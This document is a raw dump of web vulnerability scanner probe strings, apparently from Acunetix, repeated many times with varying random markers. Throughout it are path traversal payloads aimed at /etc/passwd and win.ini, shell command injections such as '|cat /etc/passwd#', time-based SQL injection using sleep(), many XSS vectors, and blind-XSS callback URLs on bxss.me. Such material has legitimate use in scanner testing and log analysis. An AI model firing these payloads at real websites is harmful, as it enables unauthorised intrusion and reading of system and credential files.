../.../.././../.../.././../.../.././../.../.././../.../.././../.../.././windows/win.ini

SomeCustomInjectedHeader:injected_by_wvs

../../../../../../../../../../etc/passwd

1

1

"&cat /etc/passwd&"

1

1<div style=width:expression(prompt(900689))>

if(now()=sysdate(),sleep(6),0)/*'XOR(if(now()=sysdate(),sleep(6),0))OR'"XOR(if(now()=sysdate(),sleep(6),0))OR"*/

SomeCustomInjectedHeader:injected_by_wvs

1

..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd%00.jpg

WEB-INF/web.xml

cat /etc/passwd

1

1

1<iframe src='data:text/html

1

1

(select(0)from(select(sleep(6)))v)/*'+(select(0)from(select(sleep(6)))v)+'"+(select(0)from(select(sleep(6)))v)+"*/

../../../../../../../../../../etc/passwd.jpg

WEB-INF\web.xml

`cat /etc/passwd`

1<body onload=prompt(950426)>

1

1

${99342+100351}

1

-1

Li4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vZXRjL3Bhc3N3ZAAucG5n

|cat /etc/passwd#

1

1

1<img src=//testasp.vulnweb.com/t/dot.gif onload=prompt(934141)>

1

1

1

-1)

..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd%00.jpg

http://some-inexistent-website.acu/some_inexistent_file_with_long_name?%00.jpg

1&n970276=v973651

'|'ld

1

1<img src=xyz OnErRor=prompt(900827)>

)

1

-1))

"|"ld

1some_inexistent_file_with_long_name%00.jpg

/../..//../..//../..//../..//../..//etc/passwd.jpg

1

!(()&&!|*|*|

1

1<img/src=">" onerror=alert(968466)>

'"()

u5JCu5f6'

1

http://testasp.vulnweb.com/t/fit.txt?%00.jpg

.\\./.\\./.\\./.\\./.\\./.\\./etc/passwd

1<ScRiPt%20>prompt(932603)</sCripT>

^(#$!@#$)(()))******

1

1

HhUCfOnj')

http://testasp.vulnweb.com/t/xss.html?%00.jpg

'

testasp.vulnweb.com

'

1&lt

/etc/passwd

1

1

1

wkD8SjZh'))

1

1

"

\xf6<img acu onmouseover=prompt(911312) //\xf6>

"

1

1

../..//../..//../..//../..//../..//../..//../..//../..//etc/passwd

1

-1

1

${@print(md5(acunetix_wvs_security_test))}

http://hitL7Qr1Vxjv2.bxss.me/

1

1<input autofocus onfocus=prompt(976784)>

acunetix_wvs_invalid_filename

||cat /etc/passwd

1

../.../.././../.../.././../.../.././../.../.././../.../.././../.../.././etc/passwd

-1)

1

<a href='http://www.acunetix.com'>website security</a>

${@print(md5(acunetix_wvs_security_test))}\

1

&dir

1

comments

1

1

-1))

)))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))

[url=http://www.acunetix.com]website security[/url]

1

'&dir&'

xaSAiDSq'

comments

http://www.acunetix.tst

1

1

..\xc0\xaf..\xc0\xaf..\xc0\xaf..\xc0\xaf..\xc0\xaf..\xc0\xaf..\xc0\xaf..\xc0\xafetc/passwd

1

1_wKEHO <ScRiPt >prompt(978272)</ScRiPt>

comments/.

'"

"&dir&"

LN60NHyS')

1

1

1

1'"()&%<ScRiPt >prompt(962041)</ScRiPt>

1

<!--

1

3NXo2e8m'))

1

1

|dir

'"()&%<ScRiPt >prompt(999482)</ScRiPt>

1

1

1

1

1

'|dir

1

1_901434

1

1

"|dir

1

1

1

1

file:///etc/passwd

1

1

/\../\../\../\../\../\../\../etc/passwd

1

1

1

acu8694\xef\xbc\x9cs1\xef\xb9\xa5s2\xca\xbas3\xca\xb9uca8694

1

WEB-INF/web.xml

acux1660\xc0\xbez1\xc0\xbcz2a\x90bcxuca1660

1

1

1

WEB-INF\web.xml

1<ScRiPt >prompt(908331)</ScRiPt>

1

1

1

1

1<script>prompt(955582)</script>

../../../../../../../../../../windows/win.ini

1

1

1

1<ScRiPt >prompt(987298)</ScRiPt>

1

../../../../../../../../../../boot.ini

1

1<ScRiPt/acu src=//testasp.vulnweb.com/t/xss.js?936937></ScRiPt>

1

1

1

1<ScRiPt >prompt(984744)</ScRiPt>

../../../../../../../../../../windows/win.ini.jpg

1<video><source onerror="javascript:prompt(959094)">

1

1

1

1

1<svg xmlns="http://www.w3.org/2000/svg"><g onload="javascript:prompt(990755)"></g></svg>

\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xafwindows\xc0\xafwin.ini

1

1

response.write(9419968*9569567)

1<div style=width:expression(prompt(933064))>

1

................windowswin.ini

1

&cat /etc/passwd&

'+response.write(9419968*9569567)+'

1<iframe src='data:text/html

1

1

..\..\..\..\..\..\..\..\windows\win.ini

'&cat /etc/passwd&'

1

"+response.write(9419968*9569567)+"

SomeCustomInjectedHeader:injected_by_wvs

1

1<body onload=prompt(908206)>

1

/.\\./.\\./.\\./.\\./.\\./.\\./windows/win.ini

1

"&cat /etc/passwd&"

SomeCustomInjectedHeader:injected_by_wvs

1

1<img src=//testasp.vulnweb.com/t/dot.gif onload=prompt(973008)>

if(now()=sysdate(),sleep(3),0)/*'XOR(if(now()=sysdate(),sleep(3),0))OR'"XOR(if(now()=sysdate(),sleep(3),0))OR"*/

../..//../..//../..//../..//../..//../..//../..//../..//windows/win.ini

1

1

cat /etc/passwd

../../../../../../../../../../etc/passwd

SomeCustomInjectedHeader:injected_by_wvs

1

1<img src=xyz OnErRor=prompt(919246)>

1

(select(0)from(select(sleep(3)))v)/*'+(select(0)from(select(sleep(3)))v)+'"+(select(0)from(select(sleep(3)))v)+"*/

../.../.././../.../.././../.../.././../.../.././../.../.././../.../.././windows/win.ini

1

1

..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd%00.jpg

`cat /etc/passwd`

1

1<img/src=">" onerror=alert(994806)>

1

-1

1

../../../../../../../../../../etc/passwd.jpg

1

1

-1)

1<ScRiPt%20>prompt(911909)</sCripT>

|cat /etc/passwd#

1

${99512+99799}

1

Li4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vZXRjL3Bhc3N3ZAAucG5n

1

WEB-INF/web.xml

1

1&lt

-1))

'|'ld

http://some-inexistent-website.acu/some_inexistent_file_with_long_name?%00.jpg

..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd%00.jpg

1

1

1&n907379=v977481

)

w4wXw0HX'

\xf6<img acu onmouseover=prompt(951517) //\xf6>

WEB-INF\web.xml

/../..//../..//../..//../..//../..//etc/passwd.jpg

1

1some_inexistent_file_with_long_name%00.jpg

1

"|"ld

!(()&&!|*|*|

mHV1oj5m')

.\\./.\\./.\\./.\\./.\\./.\\./etc/passwd

1<input autofocus onfocus=prompt(918541)>

^(#$!@#$)(()))******

http://testasp.vulnweb.com/t/xss.html?%00.jpg

'"()

http://testasp.vulnweb.com/t/fit.txt?%00.jpg

1

'

cFa6XH58'))

<a href='http://www.acunetix.com'>website security</a>

/etc/passwd

1

1

1

testasp.vulnweb.com

1

'

"

-1

[url=http://www.acunetix.com]website security[/url]

1

1

../..//../..//../..//../..//../..//../..//../..//../..//etc/passwd

1

1

"

1

${@print(md5(acunetix_wvs_security_test))}

-1)

1_urbyL <ScRiPt >prompt(948966)</ScRiPt>

1

http://hitDanKwyTNEa.bxss.me/

acunetix_wvs_invalid_filename

../.../.././../.../.././../.../.././../.../.././../.../.././../.../.././etc/passwd

1

1

||cat /etc/passwd

${@print(md5(acunetix_wvs_security_test))}\

1

-1))

1

comments

1

..\xc0\xaf..\xc0\xaf..\xc0\xaf..\xc0\xaf..\xc0\xaf..\xc0\xaf..\xc0\xaf..\xc0\xafetc/passwd

1

1

3Gk1STPo'

1

1

comments

&dir

1

1

)))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))

kDStAFJL')

http://www.acunetix.tst

1

'&dir&'

comments/.

1

1

'"

file:///etc/passwd

exuEp6vG'))

1

1'"()&%<ScRiPt >prompt(976369)</ScRiPt>

1

1

"&dir&"

1

<!--

/\../\../\../\../\../\../\../etc/passwd

1

1

1

'"()&%<ScRiPt >prompt(992979)</ScRiPt>

1

|dir

1

1

WEB-INF/web.xml

1

1_987400

WEB-INF\web.xml

1

1

1

'|dir

1

1

"|dir

1

../../../../../../../../../../windows/win.ini

1

1

1

../../../../../../../../../../boot.ini

acu6764\xef\xbc\x9cs1\xef\xb9\xa5s2\xca\xbas3\xca\xb9uca6764

1

1

acux4608\xc0\xbez1\xc0\xbcz2a\x90bcxuca4608

../../../../../../../../../../windows/win.ini.jpg

1

1<ScRiPt >prompt(941315)</ScRiPt>

1

1

1

\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xafwindows\xc0\xafwin.ini

1<script>prompt(962865)</script>

1

1

1

................windowswin.ini

1<ScRiPt >prompt(964060)</ScRiPt>

1

1

..\..\..\..\..\..\..\..\windows\win.ini

1

1<ScRiPt/acu src=//testasp.vulnweb.com/t/xss.js?977806></ScRiPt>

1

/.\\./.\\./.\\./.\\./.\\./.\\./windows/win.ini

1

1

1<ScRiPt >prompt(901287)</ScRiPt>

1

1

../..//../..//../..//../..//../..//../..//../..//../..//windows/win.ini

1

1<video><source onerror="javascript:prompt(940581)">

1

1

../.../.././../.../.././../.../.././../.../.././../.../.././../.../.././windows/win.ini

1

1<svg xmlns="http://www.w3.org/2000/svg"><g onload="javascript:prompt(912512)"></g></svg>

1

1<div style=width:expression(prompt(944733))>

1

response.write(9689747*9402526)

1

WEB-INF/web.xml

1

1<iframe src='data:text/html

1

'+response.write(9689747*9402526)+'

1

SomeCustomInjectedHeader:injected_by_wvs

&cat /etc/passwd&

WEB-INF\web.xml

1

1<body onload=prompt(999137)>

1

"+response.write(9689747*9402526)+"

../../../../../../../../../../etc/passwd

SomeCustomInjectedHeader:injected_by_wvs

'&cat /etc/passwd&'

1

1

1

1<img src=//testasp.vulnweb.com/t/dot.gif onload=prompt(968565)>

1

if(now()=sysdate(),sleep(9.75),0)/*'XOR(if(now()=sysdate(),sleep(9.75),0))OR'"XOR(if(now()=sysdate(),sleep(9.75),0))OR"*/

..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd%00.jpg

SomeCustomInjectedHeader:injected_by_wvs

"&cat /etc/passwd&"

1

1

1<img src=xyz OnErRor=prompt(913167)>

1

1

(select(0)from(select(sleep(9.75)))v)/*'+(select(0)from(select(sleep(9.75)))v)+'"+(select(0)from(select(sleep(9.75)))v)+"*/

../../../../../../../../../../etc/passwd.jpg

1

1

1<img/src=">" onerror=alert(967178)>

cat /etc/passwd

1

1

1

-1

Li4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vZXRjL3Bhc3N3ZAAucG5n

`cat /etc/passwd`

1

1<ScRiPt%20>prompt(931456)</sCripT>

1

1

1

${99532+99128}

..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd%00.jpg

1

-1)

1

|cat /etc/passwd#

1&lt

1

http://some-inexistent-website.acu/some_inexistent_file_with_long_name?%00.jpg

1

1

1

-1))

1

1&n928341=v938846

/../..//../..//../..//../..//../..//etc/passwd.jpg

\xf6<img acu onmouseover=prompt(997980) //\xf6>

'|'ld

1some_inexistent_file_with_long_name%00.jpg

)

1

1

oAcmU46c'

1

1

.\\./.\\./.\\./.\\./.\\./.\\./etc/passwd

1<input autofocus onfocus=prompt(935376)>

http://testasp.vulnweb.com/t/fit.txt?%00.jpg

"|"ld

!(()&&!|*|*|

1

testasp.vulnweb.com

DY5qYQLQ')

1

1

<a href='http://www.acunetix.com'>website security</a>

/etc/passwd

1

^(#$!@#$)(()))******

1

MX98bYm4'))

'"()

1

1

[url=http://www.acunetix.com]website security[/url]

1

1

1

-1

../..//../..//../..//../..//../..//../..//../..//../..//etc/passwd

'

1

1_8GEqb <ScRiPt >prompt(932438)</ScRiPt>

1

1

1

http://testasp.vulnweb.com/t/xss.html?%00.jpg

-1)

1

'

../.../.././../.../.././../.../.././../.../.././../.../.././../.../.././etc/passwd

1

"

1

1

1

1

-1))

acunetix_wvs_invalid_filename

"

http://hitHiWSD9ZiO7.bxss.me/

..\xc0\xaf..\xc0\xaf..\xc0\xaf..\xc0\xaf..\xc0\xaf..\xc0\xaf..\xc0\xaf..\xc0\xafetc/passwd

1

||cat /etc/passwd

1

)))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))

1

j7Nz2flR'

comments

1

${@print(md5(acunetix_wvs_security_test))}

1

&dir

1

1

1

QYXIO89t')

http://www.acunetix.tst

comments

'"

${@print(md5(acunetix_wvs_security_test))}\

1'"()&%<ScRiPt >prompt(995509)</ScRiPt>

'&dir&'

file:///etc/passwd

Cnw7tnF3'))

1

1

comments/.

<!--

/\../\../\../\../\../\../\../etc/passwd

'"()&%<ScRiPt >prompt(953995)</ScRiPt>

"&dir&"

1

1

1_953539

1

1

1

WEB-INF/web.xml

|dir

1

1

1

1

WEB-INF\web.xml

1

1

'|dir

1

1

../../../../../../../../../../windows/win.ini

1

acu6643\xef\xbc\x9cs1\xef\xb9\xa5s2\xca\xbas3\xca\xb9uca6643

"|dir

1

1

1

acux8108\xc0\xbez1\xc0\xbcz2a\x90bcxuca8108

../../../../../../../../../../boot.ini

1

1

1

1<ScRiPt >prompt(963325)</ScRiPt>

1

../../../../../../../../../../windows/win.ini.jpg

1<script>prompt(975526)</script>

1

1

1

1<ScRiPt >prompt(928513)</ScRiPt>

\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xafwindows\xc0\xafwin.ini

1

1

1

1<ScRiPt/acu src=//testasp.vulnweb.com/t/xss.js?901492></ScRiPt>

1

................windowswin.ini

1<ScRiPt >prompt(994635)</ScRiPt>

1

1

1

1

1<video><source onerror="javascript:prompt(937543)">

1

..\..\..\..\..\..\..\..\windows\win.ini

1<svg xmlns="http://www.w3.org/2000/svg"><g onload="javascript:prompt(905676)"></g></svg>

1

1

1

/.\\./.\\./.\\./.\\./.\\./.\\./windows/win.ini

1<div style=width:expression(prompt(957363))>

1

1

../..//../..//../..//../..//../..//../..//../..//../..//windows/win.ini

response.write(9937147*9150116)

1

1<iframe src='data:text/html

1

../.../.././../.../.././../.../.././../.../.././../.../.././../.../.././windows/win.ini

'+response.write(9937147*9150116)+'

1

1<body onload=prompt(900729)>

1

1

SomeCustomInjectedHeader:injected_by_wvs

"+response.write(9937147*9150116)+"

1

&cat /etc/passwd&

1<img src=//testasp.vulnweb.com/t/dot.gif onload=prompt(964991)>

1

SomeCustomInjectedHeader:injected_by_wvs

1

../../../../../../../../../../etc/passwd

1

1

'&cat /etc/passwd&'

1<img src=xyz OnErRor=prompt(953442)>

WEB-INF/web.xml

SomeCustomInjectedHeader:injected_by_wvs

..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd%00.jpg

1

1

"&cat /etc/passwd&"

1

1

1<img/src=">" onerror=alert(974429)>

if(now()=sysdate(),sleep(6),0)/*'XOR(if(now()=sysdate(),sleep(6),0))OR'"XOR(if(now()=sysdate(),sleep(6),0))OR"*/

../../../../../../../../../../etc/passwd.jpg

1

WEB-INF\web.xml

1

cat /etc/passwd

1

1

1<ScRiPt%20>prompt(991615)</sCripT>

(select(0)from(select(sleep(6)))v)/*'+(select(0)from(select(sleep(6)))v)+'"+(select(0)from(select(sleep(6)))v)+"*/

${99615+100254}

Li4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vZXRjL3Bhc3N3ZAAucG5n

`cat /etc/passwd`

1

1

1

http://some-inexistent-website.acu/some_inexistent_file_with_long_name?%00.jpg

1&lt

-1

1

1

|cat /etc/passwd#

..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd%00.jpg

1&n912263=v999605

1some_inexistent_file_with_long_name%00.jpg

1

)

-1)

\xf6<img acu onmouseover=prompt(916567) //\xf6>

'|'ld

1

1

http://testasp.vulnweb.com/t/fit.txt?%00.jpg

!(()&&!|*|*|

1

/../..//../..//../..//../..//../..//etc/passwd.jpg

-1))

1<input autofocus onfocus=prompt(948710)>

'"()

testasp.vulnweb.com

"|"ld

1

^(#$!@#$)(()))******

'

1

q0qYa6Fu'

1

<a href='http://www.acunetix.com'>website security</a>

.\\./.\\./.\\./.\\./.\\./.\\./etc/passwd

1

1

1

[url=http://www.acunetix.com]website security[/url]

"

tYxi83lh')

1

1

1

1

/etc/passwd

'

1

${@print(md5(acunetix_wvs_security_test))}

1_uLPDu <ScRiPt >prompt(992950)</ScRiPt>

rD1BMC5x'))

http://testasp.vulnweb.com/t/xss.html?%00.jpg

1

1

1

1

"

../..//../..//../..//../..//../..//../..//../..//../..//etc/passwd

${@print(md5(acunetix_wvs_security_test))}\

1

1

1

-1

1

http://hitHPGuQhu4fh.bxss.me/

1

1

||cat /etc/passwd

../.../.././../.../.././../.../.././../.../.././../.../.././../.../.././etc/passwd

)))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))

1

-1)

1

acunetix_wvs_invalid_filename

1

..\xc0\xaf..\xc0\xaf..\xc0\xaf..\xc0\xaf..\xc0\xaf..\xc0\xaf..\xc0\xaf..\xc0\xafetc/passwd

1

1

1

1

&dir

-1))

comments

http://www.acunetix.tst

1'"()&%<ScRiPt >prompt(938555)</ScRiPt>

'"

sLDryMa8'

1

'&dir&'

1

comments

<!--

'"()&%<ScRiPt >prompt(938833)</ScRiPt>

WjKbERux')

1

file:///etc/passwd

1

1_991139

"&dir&"

1

comments/.

1

XqAhYOvM'))

1

1

1

/\../\../\../\../\../\../\../etc/passwd

|dir

1

1

1

WEB-INF/web.xml

'|dir

1

1

WEB-INF\web.xml

"|dir

1

1

../../../../../../../../../../windows/win.ini

1

1

../../../../../../../../../../boot.ini

1

acu8853\xef\xbc\x9cs1\xef\xb9\xa5s2\xca\xbas3\xca\xb9uca8853

../../../../../../../../../../windows/win.ini.jpg

1

1

1

acux4758\xc0\xbez1\xc0\xbcz2a\x90bcxuca4758

\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xafwindows\xc0\xafwin.ini

1

1<ScRiPt >prompt(945468)</ScRiPt>

1

1

................windowswin.ini

1

1

1<script>prompt(920286)</script>

1

..\..\..\..\..\..\..\..\windows\win.ini

1

1

1

1<ScRiPt >prompt(944468)</ScRiPt>

1

1

/.\\./.\\./.\\./.\\./.\\./.\\./windows/win.ini

1

1

1

1<ScRiPt/acu src=//testasp.vulnweb.com/t/xss.js?982178></ScRiPt>

../..//../..//../..//../..//../..//../..//../..//../..//windows/win.ini

1

1

1

1<ScRiPt >prompt(973315)</ScRiPt>

1

response.write(9144891*9145781)

1

../.../.././../.../.././../.../.././../.../.././../.../.././../.../.././windows/win.ini

1

1<video><source onerror="javascript:prompt(954276)">

1

1

&cat /etc/passwd&

'+response.write(9144891*9145781)+'

1

1

1<svg xmlns="http://www.w3.org/2000/svg"><g onload="javascript:prompt(963756)"></g></svg>

SomeCustomInjectedHeader:injected_by_wvs

1

"+response.write(9144891*9145781)+"

'&cat /etc/passwd&'

1

../../../../../../../../../../etc/passwd

SomeCustomInjectedHeader:injected_by_wvs

WEB-INF/web.xml

1<div style=width:expression(prompt(962939))>

1

1

1

SomeCustomInjectedHeader:injected_by_wvs

..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd%00.jpg

"&cat /etc/passwd&"

if(now()=sysdate(),sleep(3),0)/*'XOR(if(now()=sysdate(),sleep(3),0))OR'"XOR(if(now()=sysdate(),sleep(3),0))OR"*/

WEB-INF\web.xml

1<iframe src='data:text/html

1

1

../../../../../../../../../../etc/passwd.jpg

1

cat /etc/passwd

1

1

(select(0)from(select(sleep(3)))v)/*'+(select(0)from(select(sleep(3)))v)+'"+(select(0)from(select(sleep(3)))v)+"*/

1

1

1<body onload=prompt(990565)>

Li4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vZXRjL3Bhc3N3ZAAucG5n

1

`cat /etc/passwd`

1

-1

1

-1)

1

1

1<img src=//testasp.vulnweb.com/t/dot.gif onload=prompt(919157)>

http://some-inexistent-website.acu/some_inexistent_file_with_long_name?%00.jpg

..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd%00.jpg

${100320+99043}

|cat /etc/passwd#

1

1some_inexistent_file_with_long_name%00.jpg

1

-1))

1

1<img src=xyz OnErRor=prompt(955706)>

1

/../..//../..//../..//../..//../..//etc/passwd.jpg

1

'|'ld

1

http://testasp.vulnweb.com/t/fit.txt?%00.jpg

1<img/src=">" onerror=alert(973548)>

rdpq9Ygd'

1

1&n991421=v917398

"|"ld

.\\./.\\./.\\./.\\./.\\./.\\./etc/passwd

1

)

testasp.vulnweb.com

1

iYdkIXWo')

1<ScRiPt%20>prompt(904486)</sCripT>

1

/etc/passwd

1

!(()&&!|*|*|

1

1

7Dhz9IhN'))

1

1&lt

'

1

^(#$!@#$)(()))******

../..//../..//../..//../..//../..//../..//../..//../..//etc/passwd

1

-1

1

\xf6<img acu onmouseover=prompt(990977) //\xf6>

1

'"()

"

1

1

1<input autofocus onfocus=prompt(949446)>

-1)

1

../.../.././../.../.././../.../.././../.../.././../.../.././../.../.././etc/passwd

'

1

http://testasp.vulnweb.com/t/xss.html?%00.jpg

1

||cat /etc/passwd

<a href='http://www.acunetix.com'>website security</a>

1

1

-1))

1

1

"

..\xc0\xaf..\xc0\xaf..\xc0\xaf..\xc0\xaf..\xc0\xaf..\xc0\xaf..\xc0\xaf..\xc0\xafetc/passwd

1

[url=http://www.acunetix.com]website security[/url]

1

1

7UcNwoyv'

http://hitElx9HD3jqE.bxss.me/

&dir

1

${@print(md5(acunetix_wvs_security_test))}

)))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))

1_GOZIT <ScRiPt >prompt(972568)</ScRiPt>

acunetix_wvs_invalid_filename

UH13Dw5q')

1

1

1

'&dir&'

${@print(md5(acunetix_wvs_security_test))}\

1

file:///etc/passwd

1

1

PkbrS0KR'))

comments

1

http://www.acunetix.tst

'"

comments

1

1

1'"()&%<ScRiPt >prompt(936783)</ScRiPt>

1

/\../\../\../\../\../\../\../etc/passwd

"&dir&"

1

1

1

comments/.

<!--

1

WEB-INF/web.xml

'"()&%<ScRiPt >prompt(978562)</ScRiPt>

1

1

1

1

1

1

WEB-INF\web.xml

1_920360

|dir

1

1

1

1

'|dir

../../../../../../../../../../windows/win.ini

1

1

../../../../../../../../../../boot.ini

"|dir

1

1

1

../../../../../../../../../../windows/win.ini.jpg

1

1

acu9139\xef\xbc\x9cs1\xef\xb9\xa5s2\xca\xbas3\xca\xb9uca9139

1

\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xafwindows\xc0\xafwin.ini

1

acux9760\xc0\xbez1\xc0\xbcz2a\x90bcxuca9760

1

1

1<ScRiPt >prompt(935297)</ScRiPt>

1

................windowswin.ini

1<script>prompt(988359)</script>

1

1

..\..\..\..\..\..\..\..\windows\win.ini

1

1<ScRiPt >prompt(963536)</ScRiPt>

1

1

/.\\./.\\./.\\./.\\./.\\./.\\./windows/win.ini

1

1<ScRiPt/acu src=//testasp.vulnweb.com/t/xss.js?979825></ScRiPt>

1

../..//../..//../..//../..//../..//../..//../..//../..//windows/win.ini

1

1

1<ScRiPt >prompt(981836)</ScRiPt>

../.../.././../.../.././../.../.././../.../.././../.../.././../.../.././windows/win.ini

1<video><source onerror="javascript:prompt(960117)">

1

1

1<svg xmlns="http://www.w3.org/2000/svg"><g onload="javascript:prompt(959596)"></g></svg>

response.write(9068397*9974523)

1

1

WEB-INF/web.xml

1

1<div style=width:expression(prompt(940088))>

1

1

'+response.write(9068397*9974523)+'

WEB-INF\web.xml

1<iframe src='data:text/html

1

&cat /etc/passwd&

1

"+response.write(9068397*9974523)+"

1

SomeCustomInjectedHeader:injected_by_wvs

1<body onload=prompt(938329)>

../../../../../../../../../../etc/passwd

'&cat /etc/passwd&'

1

1

1

1

SomeCustomInjectedHeader:injected_by_wvs

..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd%00.jpg

1<img src=//testasp.vulnweb.com/t/dot.gif onload=prompt(961340)>

1

"&cat /etc/passwd&"

1

1

if(now()=sysdate(),sleep(9),0)/*'XOR(if(now()=sysdate(),sleep(9),0))OR'"XOR(if(now()=sysdate(),sleep(9),0))OR"*/

SomeCustomInjectedHeader:injected_by_wvs

1

1

1

../../../../../../../../../../etc/passwd.jpg

1<img src=xyz OnErRor=prompt(933527)>

(select(0)from(select(sleep(9)))v)/*'+(select(0)from(select(sleep(9)))v)+'"+(select(0)from(select(sleep(9)))v)+"*/

cat /etc/passwd

1

1

1

1

1

1<img/src=">" onerror=alert(933149)>

-1

Li4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vZXRjL3Bhc3N3ZAAucG5n

`cat /etc/passwd`

1

1

1

1

1<ScRiPt%20>prompt(907859)</sCripT>

${99347+100468}

..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd%00.jpg

-1)

1

http://some-inexistent-website.acu/some_inexistent_file_with_long_name?%00.jpg

1&n906689=v901431

1&lt

1

1

|cat /etc/passwd#

1

-1))

/../..//../..//../..//../..//../..//etc/passwd.jpg

1some_inexistent_file_with_long_name%00.jpg

)

\xf6<img acu onmouseover=prompt(995289) //\xf6>

1

.\\./.\\./.\\./.\\./.\\./.\\./etc/passwd

'|'ld

1

1

o1ilOP70'

http://testasp.vulnweb.com/t/fit.txt?%00.jpg

!(()&&!|*|*|

1<input autofocus onfocus=prompt(986451)>

1

/etc/passwd

1

testasp.vulnweb.com

"|"ld

lDScKzTY')

'"()

^(#$!@#$)(()))******

'

<a href='http://www.acunetix.com'>website security</a>

../..//../..//../..//../..//../..//../..//../..//../..//etc/passwd

1

1

1

1

1j7ZYhSX')

1

[url=http://www.acunetix.com]website security[/url]

"

1

1

../.../.././../.../.././../.../.././../.../.././../.../.././../.../.././etc/passwd

1

CNcCKjHu')

1_krFkK <ScRiPt >prompt(982247)</ScRiPt>

${@print(md5(acunetix_wvs_security_test))}

1

'

1

1

1

1

..\xc0\xaf..\xc0\xaf..\xc0\xaf..\xc0\xaf..\xc0\xaf..\xc0\xaf..\xc0\xaf..\xc0\xafetc/passwd

pR4aRKou'))

1

${@print(md5(acunetix_wvs_security_test))}\

http://testasp.vulnweb.com/t/xss.html?%00.jpg

1

"

http://hituu6mdaigLR.bxss.me/

1

1

1

-1

1

1

acunetix_wvs_invalid_filename

||cat /etc/passwd

1

1

1

comments

-1)

1

)))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))

1

1

comments

&dir

1

http://www.acunetix.tst

-1))

1

'"

1

file:///etc/passwd

1

comments/.

1

1'"()&%<ScRiPt >prompt(939555)</ScRiPt>

'&dir&'

ufLrrgX8'

<!--

1

1

/\../\../\../\../\../\../\../etc/passwd

1

'"()&%<ScRiPt >prompt(996256)</ScRiPt>

HxUwzCXW')

"&dir&"

1

1

1

1_934871

WEB-INF/web.xml

BGCU52Nm'))

|dir

1

1

1

WEB-INF\web.xml

1

1

'|dir

1

acu3097\xef\xbc\x9cs1\xef\xb9\xa5s2\xca\xbas3\xca\xb9uca3097

1

"|dir

../../../../../../../../../../windows/win.ini

1

acux9088\xc0\xbez1\xc0\xbcz2a\x90bcxuca9088

1

1

1<ScRiPt >prompt(937643)</ScRiPt>

../../../../../../../../../../boot.ini

1

1

1<script>prompt(923918)</script>

1

../../../../../../../../../../windows/win.ini.jpg

1

1<ScRiPt >prompt(966598)</ScRiPt>

1

1

1<ScRiPt/acu src=//testasp.vulnweb.com/t/xss.js?963908></ScRiPt>

1

\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xafwindows\xc0\xafwin.ini

1

1

1<ScRiPt >prompt(936853)</ScRiPt>

................windowswin.ini

1

1

1<video><source onerror="javascript:prompt(917124)">

1

1

..\..\..\..\..\..\..\..\windows\win.ini

